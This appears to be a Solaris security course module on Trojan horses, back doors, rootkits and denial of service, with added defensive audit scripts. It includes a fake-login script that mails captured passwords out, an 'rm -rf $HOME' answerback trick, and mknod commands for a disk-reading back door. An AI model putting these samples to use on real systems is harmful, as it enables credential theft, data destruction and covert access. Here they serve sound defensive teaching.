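# Added example (not from the Sun course): audit a search path for a
# current-directory entry and for directories writable by others.

# path_has_cwd PATHSTRING
#   Returns 0 (true) if any component is "." or empty. An empty
#   component (a leading or trailing colon, or "::") is searched as the
#   current directory, exactly like an explicit ".".
path_has_cwd() {
    _rest="$1:"                  # trailing colon so the loop sees the last component
    while [ -n "$_rest" ]; do
        _comp="${_rest%%:*}"     # text before the first colon
        _rest="${_rest#*:}"      # everything after it
        case "$_comp" in
            ""|.) return 0 ;;
        esac
    done
    return 1
}

# path_writable_dirs PATHSTRING
#   Prints each component that exists and carries the other-write bit
#   (9th character of the ls -ld mode string), one per line. Such a
#   directory lets any user plant a program that a privileged account
#   will later run by name.
path_writable_dirs() {
    _rest="$1:"
    while [ -n "$_rest" ]; do
        _comp="${_rest%%:*}"
        _rest="${_rest#*:}"
        case "$_comp" in
            ""|.) continue ;;    # reported by path_has_cwd instead
        esac
        [ -d "$_comp" ] || continue
        _mode=$(ls -ld "$_comp" | cut -c1-10)
        case "$_mode" in
            ????????w?) printf '%s\n' "$_comp" ;;
        esac
    done
}

# Stand-alone use: audit the caller's PATH, and SUPATH from
# /etc/default/su where that file exists (Solaris).
if path_has_cwd "$PATH"; then
    echo "WARNING: PATH contains the current directory: $PATH"
fi
path_writable_dirs "$PATH" | sed 's/^/WARNING: writable by others: /'
if [ -r /etc/default/su ]; then
    _supath=$(sed -n 's/^SUPATH=//p' /etc/default/su)
    if [ -n "$_supath" ] && path_has_cwd "$_supath"; then
        echo "WARNING: SUPATH contains the current directory: $_supath"
    fi
fi
```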

Terminal Answerback

This form of Trojan horse uses the answerback modes of some terminals. Many brands of terminal and software terminal emulators used by the telnet command accept control character sequences which can echo back to the host a line of text as if it had been typed at the terminal.

For example, a command like: rm -rf $HOME <clear-screen, send-sequence>, where clear-screen and send-sequence are replaced with the appropriate control character sequences, could be embedded in an email. When the user reads the email and the screen goes blank, it is already too late because the rm command has been executed.

Answerback should be disabled on all terminals where it is present.


A Console Logout Trojan Horse

Another basic Trojan horse (known to intruders as well as to most computer science undergraduates) is a shell script that spoofs the login program, as shown in Code 4-2.

Code 4-2 Using a Trojan Horse to Gain Passwords

#!/bin/sh
# this script is left running instead of logging out
trap '' 2 3 15
/usr/ucb/clear
/bin/echo "`hostname` login: \c"
read x
/bin/echo "Password: \c"
/bin/stty -echo
read y
/bin/echo
/bin/stty echo
/bin/echo $x $y | mail user &
/bin/echo "login incorrect"
exec login


A simple defense for this kind of attack is to enter Control-D before logging in.

Other Terms for Trojan Horses

A logic bomb is a Trojan horse that is left dormant in a program until it is triggered by some event or condition. A Trojan mule is a simple Trojan horse.


Identifying Back Doors

Back doors, or trap doors, are ways to access a system without going through the normal authentication process.


Recognizing Common UNIX Back Doors

Programmers often write back doors in their programs for access for debugging or monitoring. If the programmer forgets to remove the back door before the program is released, this can be a problem.

The most infamous UNIX example of a back door is in the sendmail program. The developer used a DEBUG command to aid debugging. This command allowed any user with remote access to the sendmail program to run a command with root privileges. This back door was exploited by the Internet worm (see “The Internet Worm” on page 4-31).


Common UNIX back door attacks include the following:

● Install an altered version of programs such as login, telnetd, ftpd, or any program that spawns a shell

● Add an entry in a .rhosts file to allow future unauthorized access

● Change the /etc/vfstab file on an NFS-mounted file system to remove the nosuid option, thus allowing SUID programs to be run

● Add a mail alias so that when email is sent to the alias, a program runs which provides root access

● Change ownership of files such as the /etc/shadow file so that they can be read or modified

● Change ownership of physical devices such as the physical device file /dev/kmem which provides access to kernel memory

● Install a SUID file that provides access to a superuser shell

● Change or add a network service to provide access to a remote user


Using Devices to Create a Back Door

Special files or files found in the /etc or /devices directories are likely targets of an intruder attack. Device files can provide back door entries for attackers.

One way to view restricted files is to create a special character file using the mknod command. If the file is created with the same major and minor device numbers as an existing disk device file, and has read permissions, users can view the entire contents of the disk. If users have additional write permissions, they can change or destroy valuable data. Attackers can use a symbolic debugger (such as fsdb) or similar tools to read and alter the data.


The following commands demonstrate how a user without root-user privileges can view restricted files. In Code 4-3, the user uses the ls command to obtain the major and minor device numbers of the target device (in this case the disk slice c0t3d0s2).

Code 4-3 Obtaining Target Device Numbers

$ ls -lL /dev/dsk/c0t3d0s2
brw-r-----   1 root     sys       32, 26 Apr  5  1999 /dev/dsk/c0t3d0s2

In Code 4-3, 32 and 26 are the major and minor device numbers, respectively. Using these device numbers, the successful attacker uses the mknod command to create a special character file (Code 4-4):

Code 4-4 Creating a Special Character File

# mknod /export/home/fred/.secret_file c 32 26
# chown user /export/home/fred/.secret_file
# chmod 600 /export/home/fred/.secret_file

Note – A user must have root-user privileges to execute the mknod command; otherwise any user, not just a successful attacker, could easily obtain direct access to any system device.


When the special file exists, and the ownership has been changed, the user no longer needs to be the root user to gain access to everything on the disk. The back door has been created. The users can use the following command to look at the contents of files on the system:

$ strings -a /export/home/fred/.secret_file | grep -i root:

In this example, the attacker might be looking for the encrypted root-account password in the /etc/shadow file.

Do not expect attackers to use descriptive names such as .secret_file. Creative file naming is important to avoid detection. Attackers bury files in large system directories such as /usr/lib and disguise the files to achieve their goals. Always use the ls -a command when listing files in suspect directories to help reduce your chances of missing hidden files.

To prevent such attacks, periodically scan the file systems for special files and check the permissions on them. Character files normally exist in the /devices and /proc directories. Any special file found outside these directories should be considered a security vulnerability.


Detecting and Preventing Trojan Horse and Back Door Attacks

You can use various tools and methods to detect changes made to system files. The following sections describe tools that can help you detect these changes.

The Solaris OE Fingerprint Database

This SunSolve service lets you verify the integrity of files distributed with the Solaris OE. The Solaris OE Fingerprint database ensures that you are using a true file in an official binary distribution, and not using an altered version that can compromise system security. If you suspect that someone has changed your system without your authorization, use the Solaris OE Fingerprint Database to check files for alteration or damage (see Module 9, “Auditing File Systems”).


TripWire

The TripWire freeware product monitors file changes, verifies integrity, and notifies you of any violations of data located on network servers. The TripWire program also identifies changes to system attributes including file size, access flags, write time, and more. Tripwire can also generate MD5 checksums for binaries (see Module 9, “Auditing File Systems”).

Checklists, File Digests, and Checksums

A simple way to detect changes to a file system is to store a checklist created with the ls command. For example, the following command creates a file listing. Subsequently running the same command and comparing the two outputs with diff detects any changes:

# ls -ild /usr/bin/* > /usr/adm/filelist

Note – An attacker can modify the file list to cover up any changes.

However, an attacker can change a file in a way that is not detected by this type of basic checklist.

To improve the checklist, use the sum command to generate a cyclic-redundancy-check (CRC) checksum and block count for each file. For example, the following command creates both a file listing and a CRC checksum for each file in the /usr/bin directory:

# find /usr/bin -type f -print | xargs sum > /var/security/filecheck

However, because well-known polynomials generate a CRC, an attacker can alter a file so that it still generates the same checksum. There are stronger checksums available, including the MD5 message-digest algorithm.
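The checklist-plus-checksum method above as a small baseline-and-compare script, added here as an example (not code from the course). It assumes POSIX sh, find, ls, awk and cksum; cksum is a CRC like sum, so set DIGEST to a message digest such as md5sum where one is installed, as the text advises.

```shell
#!/bin/sh
# Added example (not from the Sun course): record a checksum baseline of
# a directory tree, then detect added, removed and changed files by
# comparing a later run against it. The listing (inode, mode, owner,
# size from ls) and the checksum are kept together, one line per file.
#
# DIGEST is the checksum command run on each file. cksum (assumed here;
# POSIX, present on Solaris and Linux) is a CRC, which the text notes an
# attacker can forge; use DIGEST=md5sum or another message digest where
# one is available.
DIGEST="${DIGEST:-cksum}"
TAB=$(printf '\t')

# baseline_create DIR OUTFILE
#   Writes one tab-separated line per regular file under DIR:
#   path, checksum, inode, mode, uid, gid, size. Inode and mode come
#   from ls -lni, so a replaced file shows up even if its size is kept.
baseline_create() {
    _dir="$1"; _out="$2"
    find "$_dir" -type f -print | sort | while read -r _f; do
        _sum=$($DIGEST < "$_f" | awk '{print $1}')
        _meta=$(ls -lni "$_f" | awk '{print $1 "\t" $2 "\t" $4 "\t" $5 "\t" $6}')
        printf '%s\t%s\t%s\n' "$_f" "$_sum" "$_meta"
    done > "$_out"
}

# baseline_compare DIR BASEFILE
#   Rebuilds the listing for DIR and prints ADDED, REMOVED or CHANGED,
#   a tab, and the path for every difference. Returns 0 when the tree
#   matches the baseline, 1 otherwise.
baseline_compare() {
    _dir="$1"; _base="$2"
    _now="${TMPDIR:-/tmp}/baseline.$$"
    baseline_create "$_dir" "$_now"
    _diff=$(awk -F "$TAB" '
        FILENAME == ARGV[1] { base[$1] = $0; next }
        {
            if (!($1 in base))       print "ADDED\t" $1
            else if (base[$1] != $0) print "CHANGED\t" $1
            seen[$1] = 1
        }
        END { for (p in base) if (!(p in seen)) print "REMOVED\t" p }
    ' "$_base" "$_now")
    rm -f "$_now"
    [ -z "$_diff" ] && return 0
    printf '%s\n' "$_diff"
    return 1
}

# Stand-alone use: baseline.sh create|compare DIR BASEFILE
# Keep BASEFILE off the monitored system: the note above warns that an
# attacker who can reach the list can edit it to hide changes.
case "${1:-}" in
    create)  baseline_create "$2" "$3" ;;
    compare) baseline_compare "$2" "$3" ;;
esac
```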

The BSM Audit Trail

If you have initiated auditing and set the appropriate flags to monitor writing to files, you can detect changes to system files.


Using the find Command

Using more sophisticated tools for fingerprinting and checking systems is the preferred route for securing your system against user attacks. But where these tools are not available, or the system has not yet been fingerprinted, the find command is a good alternative.

The find command has many useful options for searching for potential Trojan horses or back doors. Table 4-1 shows some of the find command options.

Multiple selection criteria can be combined using the symbols in Table 4-2.

Table 4-1 The find Command Options

Option Description

-nouser Files not owned by a valid user

-user user Files owned by the user specified

-perm -perms Files with one or more permissions set

-mtime -days Files modified in the last few days

-newer file Files newer than a specified file

Table 4-2 Operators for Combining Selection Criteria

Symbol Definition

\( ….. \) Group or separate logical criteria

-a And

-o Or

! Not


Example find Commands

Some example find commands are:

● Find all files in the /usr directory modified in the last 24 hours:

find /usr -mtime -1 -print

● Find all files owned by the root user in the user’s home directory:

find /export/home -user root -print

● Find all set-user-id files owned by the root user in the /usr/bin directory:

find /usr/bin -user root -perm -4000 -print

● Files or directories owned by root and writable by others:

find / -user root \( -type f -o -type d \) -perm -2 -print
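The find criteria above, together with the special-file check from “Using Devices to Create a Back Door”, combined into one scan. This is an added example, not code from the course; it assumes POSIX sh, find and grep. OWNER is a parameter so the scan can be tried on a test tree owned by an ordinary user; on a real system pass root.

```shell
#!/bin/sh
# Added example (not from the Sun course): a file-system scan assembled
# from the find criteria in Tables 4-1 and 4-2 and the special-file
# check described under "Using Devices to Create a Back Door".
#
# scan_tree ROOT OWNER DAYS
#   ROOT   tree to examine (/usr, or / for the whole system)
#   OWNER  privileged account of interest: root on a real system; it is
#          a parameter so the scan can be exercised on a test tree that
#          an ordinary user owns
#   DAYS   "modified in the last DAYS days" window for the RECENT check
# Each finding is printed as TAG, a tab, and the path.
tag() {
    while read -r _f; do printf '%s\t%s\n' "$1" "$_f"; done
}

scan_tree() {
    _root="$1"; _owner="$2"; _days="$3"

    # SETID: set-user-id or set-group-id files owned by OWNER. A back
    # door shell is usually a SUID copy of sh/ksh, so every entry here
    # should be a known system program.
    find "$_root" -type f -user "$_owner" \
        \( -perm -4000 -o -perm -2000 \) -print | tag SETID

    # WWRITE: files or directories owned by OWNER that others can write
    # (the last example above); these let any user replace a program
    # the privileged account runs.
    find "$_root" -user "$_owner" \( -type f -o -type d \) -perm -2 -print |
        tag WWRITE

    # NOUSER: files whose owner is not in the password database, often
    # left behind by a deleted account or an unpacked archive.
    find "$_root" -nouser -print | tag NOUSER

    # SPECIAL: block or character special files anywhere except /devices
    # and /proc (and /dev, whose entries are links to /devices on
    # Solaris). A device node elsewhere, readable by a user, is the
    # mknod back door.
    find "$_root" \( -type b -o -type c \) -print |
        grep -v -e '^/devices/' -e '^/dev/' -e '^/proc/' | tag SPECIAL

    # RECENT: regular files modified in the last DAYS days, for review
    # against known change records.
    find "$_root" -type f -mtime -"$_days" -print | tag RECENT
}

# Stand-alone use: scan.sh ROOT [OWNER] [DAYS]
if [ $# -ge 1 ]; then
    scan_tree "$1" "${2:-root}" "${3:-1}"
fi
```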


Preventing Trojan Horse and Back Door Attacks

You can implement the following recommendations to reduce the risk of an attacker placing a Trojan horse on your system:

● Your first task in preventing Trojan horses is to harden the file system. This involves:

● Removing write access from all directories that do not require it

● Ensuring that the file and directory permissions are as secure as possible

● Removing programs that are not required (in particular, compilers)

● Check the validity of software loaded onto your system. Do not automatically trust software, even if it is from a reputable commercial firm. You should install all new software on spare machines for testing, not on critical production systems.


● Consider using the Automated Security Enhancement Tool (ASET). ASET is a set of administrative utilities that can improve system security by checking the settings of system files, including both the attributes (such as permissions and ownership) and the contents of the system files. It warns of potential security problems and, where appropriate, sets the system files automatically according to the security level specified. ASET is discussed in Module 14, “Hardening the System.”

Note – Pay particular attention to scripts in the rc*.d directories to ensure that back doors have not been installed there. System administrators have spent considerable time cleaning a system only to have the back doors reappear after a reboot.


Rootkits – Understanding How Attackers Use Them

Rootkits are utility programs that attackers use to hide their presence on a system and to give them back door access in the future. The big appeal to the average attacker is that rootkits do not require any great expertise or knowledge to run them. Intruders do not use rootkits to gain root access to the system but rather to hide and secure their presence when system security has been breached.

The initial attack that gives attackers superuser access was probably ‘noisy,’ generating a lot of network traffic and hopefully a great deal of log or audit data. When root access has been obtained, attackers have no difficulty covering their tracks using the rootkit utilities. Intruders have programs in the rootkit that remove login entries from the wtmpx, utmpx, and lastlog files. Other shell scripts can clean up log entries in files such as /var/log and /var/adm.


Installing Back Doors and Trojan Horses

After removing all evidence that the system has been breached, an intruder can leave a back door to gain root access again at any time.

Common rootkit back doors are:

● Replacing login, passwd, or sh/ksh/csh commands to allow the intruder to spawn a root shell at any time. The smart intruder also disables any history mechanism on this shell.

● Replacing the rsh shell so that a root shell is spawned when the special rootkit user name is given (for example, rsh hostname -l rootkit_user).

● Binding a root shell to an unusual port number.

An intruder might install all of these back doors so that if the original security hole that allowed root access in the first place is fixed, the intruder still has numerous ways to access your system. In addition, while logged in as the root user, the intruder might install a sniffer program to obtain account passwords on other systems. Therefore, even if the original breached system is taken out of operation to be reinstalled, the intruder might already have gained access to the rest of your network.

Table 4-3 shows other Trojan horse programs that commonly form part of the rootkit.

Table 4-3 Rootkit Trojan Horse Programs

Program Effect

ls, find, du Does not display or count the attacker’s files.

ps , top Does not display the attacker’s processes.

netstat Does not display the attacker’s traffic.

killall Does not kill the attacker’s processes.

ifconfig Does not display the word PROMISC when sniffer is running.

crontab Hides the attacker’s crontab entry. The hidden crontab entry is not in the /var/adm/cronjobs directory.

tcpd Does not log attacker connections listed in the configuration file.

syslogd Does not log attacker activity.


Detecting Rootkit Use

Techniques for detecting Trojan horses and back doors were presented in “Detecting and Preventing Trojan Horse and Back Door Attacks” on page 4-18. If the intruder has been careless, you can also detect the use of a rootkit.

Often, the programs listed in Table 4-3 on page 4-25 that are replaced with Trojan copies have configuration files that list which programs to hide and which to display. Sometimes the intruder forgets to hide these configuration files. Most of the files in the /dev directory are symbolic links, and the /dev directory is the default location for many of these configuration files, so check there for any normal files. The default setup for many rootkits is to have the configuration file begin with pty, such as /dev/ptys or /dev/ptyr.


In addition, look at modification times of all programs. Although good attackers fix the modification times on back doors and Trojan horses, they sometimes forget to do so on a few files or directories. Use the following code line (where N is the number of days you believe that the attacker has had access to your system):

# find / -mtime -N -print

Inside each modified directory, compare the output of echo * with ls. If the ls file has been replaced with a Trojan copy and configured to hide anything, the echo command shows it.

Run the strings command on system binaries. For example, if:

# strings /usr/sbin/inetd

produces the string /bin/sh (or something similar) you should be suspicious of this file. You can also look at the file type, as shown in Code 4-5.

Code 4-5 Checking File Type

# file /usr/sbin/inetd
/usr/sbin/inetd: ELF 32-bit MSB executable SPARC Version 1, dynamically linked, stripped

If the output of file says that the program is not stripped, it has been tampered with.

The intruder might have left some rootkit utilities on the system. Table 4-4 shows some programs to look for.

Table 4-4 Rootkit Utilities

Program Use

fix Installs a Trojan horse (for example ls) with the same timestamp and checksum information

sniffchk Checks to make sure a sniffer is still running

wted An editor for the wtmp file

z2 Erases entries from the wtmpx/utmpx/lastlog file

bindshell Binds a root shell to a port (port 31337 by default)


You should become familiar with the /proc file system. You can examinethis directory to find out which processes are running. Compare theoutput to what the ps command shows so that you can determinewhether the ps command has been modified. The Solaris OE has manyutilities which provide more information on processes in the /proc filesystem (see Solaris OE manual page proc(1) ).

The best defense is a clean set of statically linked1 binaries for yoursystem. Keep a copy of common programs such as ps , ls , and ifconfigstored on a CD-ROM or floppy disk. When you suspect a compromisedsystem, download the clean binaries, ensure that your PATHenvironmentvariable is set to use them, and begin looking for back doors.

Note – A number of statically linked utilities are provided in the/usr/sbin/static directory.

Kernel Rootkits

The kernel rootkit is a troubling development in the hacker world. This rootkit exploits the use of loadable kernel modules (LKMs) to modify the running UNIX kernel, so that every program on the system, including your clean statically linked binaries, sees only what the rootkit allows.

With the initial root account access, the attacker uses the modload command to load two kernel modules. The first contains the hacking utilities. The second ensures that the rootkit modules do not appear in the modinfo listing.

Table 4-5 shows typical utilities in a kernel rootkit.

1. An attacker can modify or replace system libraries, so any dynamically linked program cannot be trusted. A statically linked binary does not load those libraries.

Table 4-5 Kernel Rootkit Utilities

Utility          Use

hidef, unhidef   Hides and unhides files on the system

ered             Performs exec redirection, which allows Trojan horse programs to execute in place of the real ones

nethide          Hides connections by the attacker from other systems

testhack         Changes the UID, GID, or both, of a running process (for example, to change the process owner of a running /bin/sh to root)

rootme           Gains root access without running SUID programs

Preventing Kernel Rootkit Attacks

When the attacker has modified the kernel, and covered the initial tracks, it is very difficult to detect the intrusion from the running system. To ensure LKMs are reloaded after a system reboot, the attacker must hide the module either in the standard locations for loadable modules or in the /etc/init.d startup scripts.

At boot time, the kernel loads modules from the following directories (the default value of the moddir variable):

/platform/`uname -i`/kernel:/platform/`uname -m`/kernel:/kernel:/usr/kernel

You should check these directories for "foreign" files on a regular basis using auditing tools such as Tripwire or the Solaris Fingerprint Database. Also check /etc/system for a moddir setting that adds a directory to this search path, and for forceload entries that name a module you do not recognize. When you suspect a kernel rootkit, make the comparison after booting from trusted media rather than under the suspect kernel.
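The following baseline-and-compare check is an added example, not part of the original course. It records the POSIX cksum of every file in the module directories and reports later additions, removals and changes. MODDIRS is an assumed override that lets the same functions be run against any directory tree.

```shell
#!/bin/sh
# Added example (not from the original course). Record a baseline of every
# file in the kernel module directories and report later additions,
# removals and changes. cksum is the POSIX CRC tool, so this runs on a
# stock Solaris 8 system. Keep the baseline file off the host (or on
# read-only media) where a root intruder cannot edit it.

# module_dirs: the directories searched for modules at boot, in search
# order. MODDIRS (assumed name) is a space-separated override for testing
# on other trees; it is deliberately left unquoted so it splits into words.
module_dirs() {
    if [ -n "$MODDIRS" ]; then
        printf '%s\n' $MODDIRS
    else
        printf '%s\n' "/platform/`uname -i`/kernel" \
                      "/platform/`uname -m`/kernel" /kernel /usr/kernel
    fi
}

# baseline_modules OUTFILE: write "crc size path" for every regular file.
# Module paths contain no spaces, so the path is safely field 3.
baseline_modules() {
    for d in $(module_dirs); do
        [ -d "$d" ] && find "$d" -type f -exec cksum {} \;
    done | sort -k 3 > "$1"
}

# compare_modules BASELINE: print "NEW path", "MISSING path" or
# "CHANGED path" for each difference between BASELINE and the tree now.
# Prints nothing when the tree matches the baseline.
compare_modules() {
    now=$(mktemp) || return 1
    baseline_modules "$now"
    awk '
        FILENAME == ARGV[1] { base[$3] = $1 " " $2; next }
        {
            if (!($3 in base))              print "NEW " $3
            else if (base[$3] != $1 " " $2) print "CHANGED " $3
            seen[$3] = 1
        }
        END { for (p in base) if (!(p in seen)) print "MISSING " p }
    ' "$1" "$now" | sort
    rm -f "$now"
}
```

Take the baseline right after installation or patching (baseline_modules /floppy/modules.base), and run compare_modules from cron or after any suspected intrusion; a NEW entry under /usr/kernel/drv or /kernel/fs that no patch explains is the kind of "foreign" file the text warns about. A CRC is enough to notice accidental or casual change; against an attacker who knows the baseline is a CRC, an MD5 fingerprint is the stronger choice.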


Identifying Denial of Service Attacks

Denial of service (DoS) can occur for many reasons, including:

● Physical destruction of equipment

● Removal of data or software

● Malicious system configuration changes

● Depletion of system resources such as memory, swap space, file space, network bandwidth, and so on

DoS is usually the result of users using more system resources (such as disk space, memory, or the number of processes running) than they should. Attacks like these can be accidental or malicious, and the attackers might be trusted internal users or outside intruders. As the system's resources are depleted by the attacker, other users cannot log in or run programs.

When suspicious files or processes are detected, prompt and proper action is required. Disk space, swap space, memory, and the number of processes all need attention and protection.


Malicious DoS Attacks

Worms or fork bombs are intentional attacks on system resources. Worms are self-replicating programs that copy themselves within a system, or from system to system.

The Internet Worm

The most well-known example of this type of problem is the Internet worm, which infected the Internet in 1988. Within an eight-hour period, 2500 to 3000 systems were infected and were using all of their processor time to distribute the worm.

The success of the Internet worm was based on its three options for transmission:

● A buffer overflow bug in the fingerd daemon

● Exploitation of "trusted hosts" using the rsh remote shell command and the .rhosts and hosts.equiv trust files

● A bug in the sendmail program (debug mode)


Fork Bombs

Fork bombs are processes that duplicate themselves, sometimes exponentially, until the maximum number of system processes is exceeded and no new processes can start. On the Solaris OE the maxuprc tunable caps the number of processes a single non-root user can create, which stops a fork bomb run from an ordinary account from exhausting the whole process table.

The following are all examples of malicious DoS attacks that have been used against systems.

Toll-Free Number Attack

In the mid 1980s, a political organization set up a toll-free telephone number. An individual programmed his computer to repeatedly dial the number and then hang up. This did two things:

● It busied the line so that legitimate callers could not get a connection

● It cost the organization money every time a call was completed

Network Attacks

Network attacks include:

● TCP SYN – A DoS attack that takes advantage of the TCP three-way handshake: the attacker sends many SYN segments, usually from forged source addresses, and never completes the handshake, so the server's queue of half-open connections fills and legitimate connection requests are refused (see Module 10, "TCP SYN Flood Attack" on page 10-35).

● Ping of death – An attack that sends a fragmented ICMP echo request (ping) whose fragments reassemble to more than the maximum legal IP datagram size of 65,535 bytes. A server with a vulnerable IP stack typically crashes when trying to reconstruct the illegal packet.

● Smurf – An attack where an ICMP echo request is sent to the broadcast address of a network so that every machine on it replies. The source address of the request is forged to be the machine being attacked, so the replies from the whole network, many times the attacker's own bandwidth, overload that machine's network interface. Networks whose routers forward directed broadcasts act as the amplifier.


Preventing DoS Attacks

While some DoS attacks cannot be prevented, many others can be. Table 4-6 lists attacks and their preventions.

Table 4-6 Malicious DoS Attacks

Attack                          Prevention

Reformatting a disk partition   Prevent access to systems in single-user mode (for example, by setting a PROM security password). Protect the root account. Physically write-protect read-only disks.

Deleting critical files         Same protection as described in "Detecting and Preventing Trojan Horse and Back Door Attacks" on page 4-18. Set ownership of NFS-mounted file systems to the root user and export them read-only.

Powering down machine           Physically secure the machine in a locked area. Protect systems with uninterruptible power supplies.

Damaging cables                 Run cables through conduits and protect areas where cables are exposed.


Table 4-6 Malicious DoS Attacks (Continued)

Attack                                  Prevention

System crash due to process overload    Set the kernel tunable parameter maxuprc (for example, set maxuprc=50 in /etc/system) to limit the number of processes a single non-root user can create.

Filling up disks                        Protect ufs file systems with disk quotas. Use the quot, du, and find commands to analyze disk use. Set the file system minfree value to maintain a sensible amount of free space using the tunefs command.

Network attacks                         Restrict access to your networks with correctly set up routers and firewalls. Use network monitors such as Courtney or Gabriel.

Recognizing Causes of Accidental DoS

Accidental DoS is nearly always preventable, but accidents do happen. Table 4-7 contains a list of common problems that can lead to DoS.

Table 4-7 Accidental DoS

Problem                                                                Prevention

Large log files filling up file systems                                Monitor disk free space regularly. Archive or summarize and remove large log files on a regular basis.

Accidentally archiving to a file rather than a removable media device  Set file size limits with the shell's limit (csh) or ulimit (sh, ksh) command. Put backup commands in scripts so that the device name is not typed by hand.

Programs in development hogging system resources                       Use the shell's ulimit command to restrict the number of open files, CPU time, and memory usage. Set the kernel tunable parameter maxuprc to a number such as 50.
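The following script is an added example, not part of the original course. It automates the "filling up disks" rows of Tables 4-6 and 4-7: it flags nearly full file systems from df -k output and lists the largest files on one file system so that the runaway log or misdirected archive can be found. SAMPLE_DF is constructed to look like Solaris df -k output.

```shell
#!/bin/sh
# Added example (not from the original course). Two checks for the
# "filling up disks" problems in Tables 4-6 and 4-7: flag file systems
# that are nearly full from df -k output, and list the largest files on
# one file system so the culprit (a runaway log, an archive written to a
# file) can be found. SAMPLE_DF is constructed to look like Solaris df -k.

SAMPLE_DF='Filesystem            kbytes    used   avail capacity  Mounted on
/dev/dsk/c0t0d0s0    1016122  701876  253279    74%    /
/dev/dsk/c0t0d0s3    2053605 1951313   40684    98%    /var
/dev/dsk/c0t0d0s7    8261477  500101 7678761     7%    /export/home
swap                 1447120      16 1447104     1%    /tmp'

# full_filesystems THRESHOLD  (df -k output on stdin)
#   Prints "capacity mountpoint" for every file system whose capacity
#   column is at or above THRESHOLD percent. Intended for cron:
#     df -k | full_filesystems 90
full_filesystems() {
    awk -v limit="$1" '
        NR == 1 { next }                       # header line
        NF >= 6 {
            pct = $5
            sub(/%/, "", pct)
            if (pct + 0 >= limit + 0) print pct "% " $6
        }'
}

# big_files DIR KBYTES
#   Lists regular files under DIR, without crossing mount points, that are
#   larger than KBYTES kilobytes. find -size counts 512-byte blocks, hence
#   the doubling. Output: "kbytes path", largest first.
big_files() {
    blocks=$(( $2 * 2 ))
    find "$1" -xdev -type f -size +"$blocks" -exec wc -c {} \; |
        awk '{ print int(($1 + 1023) / 1024), $2 }' | sort -rn
}
```

Run full_filesystems 90 from a cron job that mails its output, and follow a hit on /var with big_files /var 10240 to see which log has grown. The awk does the comparison, so the same two functions work unchanged on df output from any host whose columns match.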


Exercise: Detecting Trojan Horses and Back Doors

In this exercise, you complete the following tasks:

● Use your knowledge and skills to find and remove Trojan horses and back doors preinstalled on your system

● Discuss how the system could have been hardened to prevent the attacks

Task – Detecting Trojan Horses and Back Doors

Unknown to you, back doors and Trojan horses were created when you ran the setup script in the exercises for Module 1.

Detect as many of these Trojan horses and back doors as you can.


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following are the solutions to the exercises.

Detecting Trojan Horses and Back Doors

1. You have four back doors and two Trojan horses on your system.

a. A shell script called find in eve's home directory that creates a SUID Korn shell in the /tmp directory.

b. A device /devices/pseudo/ptd@0:ptminor that gives anyone access to the raw device where the root directory is mounted.

c. Access for eve to the same root directory through a device in eve's home directory called .root.

d. A superuser account called ftfp with superuser UID 0.

e. A .rhosts file in / that gives the eve user access to the system as the root user.

f. The system file /usr/bin/clear has been replaced with a program that creates a root-owned Korn shell in eve's home directory whenever it is run.

Note – If you think you have found another attack not listed here, please inform your instructor.

2. These are the preventative measures:

a. You cannot stop user eve from writing a script such as the find script here, but removing the current directory (and any relative entry) from the root account's PATH prevents it from being run in place of /usr/bin/find. Checking /tmp for SUID files (find /tmp -perm -4000) shows the shell it leaves behind.

b. This device had to be installed by someone with access to the root account (the mknod utility requires superuser privileges), so this can only be prevented by stopping access to the superuser account. Check the file systems regularly for device nodes outside /dev and /devices, and for device nodes that are world-readable or world-writable.

c. Same solution as step 2b.


d. Although it is impossible to prevent someone with access to the root account from editing the password and shadow files, these files should be monitored regularly for unauthorized changes, in particular for any account other than root that has UID 0 (logins -d lists it as a duplicate of root).

e. Methods of mitigating attacks of this kind are covered later in this course.

f. You should check all system utilities regularly for changes in size, modification time, and checksum; the Solaris Fingerprint Database or an integrity checker such as Tripwire gives you a trusted baseline to compare against.
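The following sweep is an added example, not part of the original course or its setup script. It looks for the kinds of back door planted in this exercise: SUID or SGID files left in directories such as /tmp, device nodes outside /dev and /devices, .rhosts entries that grant access, and a root PATH that would run ./find. ROOT is the tree to scan ("/" on a real host); only POSIX find and awk are used, so it runs on a Solaris 8 system.

```shell
#!/bin/sh
# Added example (not from the original course). A sweep for the kinds of
# back door planted in this exercise: SUID or SGID files left in a
# directory such as /tmp, device nodes outside /dev and /devices, .rhosts
# entries that grant access, and a root PATH that would run ./find.
# ROOT is the tree to scan; it is "/" on a real host and a temporary
# directory in the test. Only POSIX find and awk are used.

# suid_files ROOT: every regular file under ROOT with the SUID or SGID bit
suid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# stray_devices ROOT: block or character device nodes anywhere except
# under ROOT/dev and ROOT/devices (and the /proc pseudo file system).
# Top-level entries are walked one at a time because Solaris 8 find has no
# -path primary with which to exclude a directory by its full name.
stray_devices() {
    for entry in "$1"/* "$1"/.[!.]*; do
        [ -e "$entry" ] || continue
        case "$entry" in
            "$1"/dev|"$1"/devices|"$1"/proc) continue ;;
        esac
        find "$entry" \( -type b -o -type c \) -print
    done | sort
}

# rhosts_grants FILE: the non-comment entries of a .rhosts file, with the
# "+" wildcard forms flagged. Nothing is printed if the file is absent.
rhosts_grants() {
    [ -f "$1" ] || return 0
    awk '
        /^[ \t]*#/ || NF == 0 { next }
        $1 == "+" && $2 == "+" { print $0 " (WILDCARD: any user from any host)"; next }
        $1 == "+"              { print $0 " (WILDCARD: any host)"; next }
        { print }' "$1"
}

# unsafe_path PATHVALUE: true (exit 0) when the path contains the current
# directory (".", or an empty component) or any relative component, which
# is what lets a script named find in a user's directory run as root.
unsafe_path() {
    case ":$1:" in *::*|*:.:*) return 0 ;; esac
    saved_ifs=$IFS
    IFS=:
    set -- $1
    IFS=$saved_ifs
    for component in "$@"; do
        case "$component" in /*) ;; *) return 0 ;; esac
    done
    return 1
}
```

On the exercise system, suid_files / finds the Korn shell that the find script drops in /tmp, stray_devices / finds the .root device in eve's home directory, rhosts_grants /.rhosts shows the entry for eve, and unsafe_path "$PATH" run from a root shell reports whether ./find would have been picked up at all. The ftfp account and the replaced /usr/bin/clear are not file-system anomalies of these kinds; they need the passwd audit and the checksum comparison described in the solutions.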


Module 5

Administering User Accounts Securely

Objectives

Upon completion of this module, you should be able to:

● Explain how to add, maintain, and delete user accounts securely

● Administer login accounts with special requirements

● Describe how to make special user accounts more secure

● Configure restricted shell accounts


Relevance


Discussion – Consider what your company's security requirements are, and what the primary lines of defense should be. How can you protect:

● User accounts?

● Access to the root directory?

